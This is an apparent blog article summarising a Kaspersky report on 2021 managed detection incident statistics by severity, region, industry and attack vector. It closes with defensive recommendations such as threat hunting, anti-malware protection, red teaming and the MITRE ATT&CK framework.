All types of organizations at some point encounter a cybersecurity breach leading to high severity incidents and with every passing year, the share of human-driven targeted attacks is going on increasing. According to a report by Kaspersky, Managed Detection and Response (MDR) teams detect an average of one new critical incident per day.
Continue reading to know what kinds of incidents they are, which industries and regions are being attacked the most and what kinds of tools and techniques are the attackers using.
As per the report, in 2021, 14% of the detected incidents were high severity incidents that were human-driven attacks or malware with a huge impact. The share of the medium severity incidents was 66%. Low severity incidents reported was 20% without significant effect on corporate business processes. Considering the regions, the report reveals that Europe (47%) encountered the most attacks followed by CIS (23%), APAC (16%), META (6%), North America (5%), and LATAM (3%).
The below graph shows the distribution of high, medium, and low severity incidents across different industries.
Analysis of the high severity incidents
The report says that phishing, user execution, and exploitation of remote services were the most popular ways how organizations fell victim to critical incidents.
- 32.4% of organizations reported high severity incidents of which over 40% were related to targeted attacks/APT.
- 5.4% of surveyed organizations faced critical incidents that were the result of insider impact amounting to around 3% of reported incidents.
- 14% of the high severity incidents in 14.7% of the organizations were due to malware.
- 16.2 % of organizations encountered such incidents as a part of ethical offensive exercises (18%).
- 8.8% of organizations experienced incidents related to social engineering attacks.
- 13.2% of the organizations cited critical vulnerabilities as a reason for coming under cyberattacks.
As per the report, successful social engineering attacks and critical vulnerabilities indicated the possibilities of APT. Government, industrial, IT, and financial organizations had the largest number of APT-related incidents. Other organizations where APT was detected include development and telecom companies.
Financial and IT organizations top the list of organizations affected by red teaming incidents. Almost all organizations except those related to development, telecom, and education had conducted red teaming exercises and reported incidents.
Tools used
Attackers used a wide variety of LOL (Living Off the Land) tools to cause high-severity incidents. The most popular tools were cmd.exe and powershell.exe. and rundll32.exe.
Inferences:
- Human-driven targeted attacks are increasing year after year. Therefore, implementing manual threat hunting along with classical alert-driven monitoring will be efficient to detect such attacks.
- As more than 14% of high-severity incidents are related to malware, the need for comprehensive anti-malware protection is imperative.
- Red team exercises are an efficient approach to assessing the security of an organization.
- Using the MITRE ATT&CK framework for threat detection to track the cyber adversary tactics will strengthen the organization’s security.
Image and source credits: Kaspersky
Also read: What’s the impact of a security breach?
